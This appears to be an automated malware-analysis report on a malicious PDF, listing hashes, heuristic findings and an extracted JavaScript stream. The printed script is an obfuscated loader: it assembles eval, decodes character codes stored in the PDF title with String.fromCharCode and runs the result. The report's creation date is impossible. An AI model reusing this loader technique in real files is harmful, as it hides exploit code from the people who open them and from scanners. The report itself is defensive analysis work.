PDF malware analysis — malicious · b6a277e8e4589e3c

MALICIOUS

PDF

32.5 KB Created: 2011-72-51 03:25:00 Authoring application: String.fromCharCode First seen: 2012-11-25

MD5: 81ebfa8c9a10a08caa88be7088e8b2d8 SHA-1: 24f4a977c4749211bc3bd8fe582f80684e872c50 SHA-256: b6a277e8e4589e3cb51f8235d7058a7a044df29099d4449befb5c3c9274ff627

114 Risk Score

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
/Producer (String.fromCharCode)
```
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0x7F8C 372 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0x7F8C	372 bytes
SHA-256: `9795107c7a1c40da64a4d8a3389f1015d6b913e59657d022952605d3bc4374c1`
Preview script First 1,000 lines of the extracted script var g = this; a=['l','v','e','a']; e=g[a[2]+a[1]+a[3]+a[0]]; bqt=2011; var $ = bqt-1979; var vejxm=""; zued='his'; jqo='.tit'; e('uaohi=t'+zued+jqo+'le'); e(e('wll=t'+zued)); hbvj='.produ'; e('agu=t'+zued+hbvj+'cer'); oixr=e(agu); nhyhk = uaohi.split(','); for (i = 0; i < nhyhk.length; i++) { qbmo = e(nhyhk[i]); vejxm += oixr(qbmo); } e(vejxm);

SHA-256: 9795107c7a1c40da64a4d8a3389f1015d6b913e59657d022952605d3bc4374c1

Preview script

First 1,000 lines of the extracted script

var g = this;
a=['l','v','e','a'];
e=g[a[2]+a[1]+a[3]+a[0]];
bqt=2011;
var $ = bqt-1979;
var vejxm="";
zued='his';
jqo='.tit';
e('uaohi=t'+zued+jqo+'le');
e(e('wll=t'+zued));
hbvj='.produ';
e('agu=t'+zued+hbvj+'cer');
oixr=e(agu);
nhyhk = uaohi.split(',');
for (i = 0; i < nhyhk.length; i++) {
	qbmo = e(nhyhk[i]);
	vejxm += oixr(qbmo);
}
e(vejxm);

Open this report in the interactive analyzer, or submit your own file for analysis.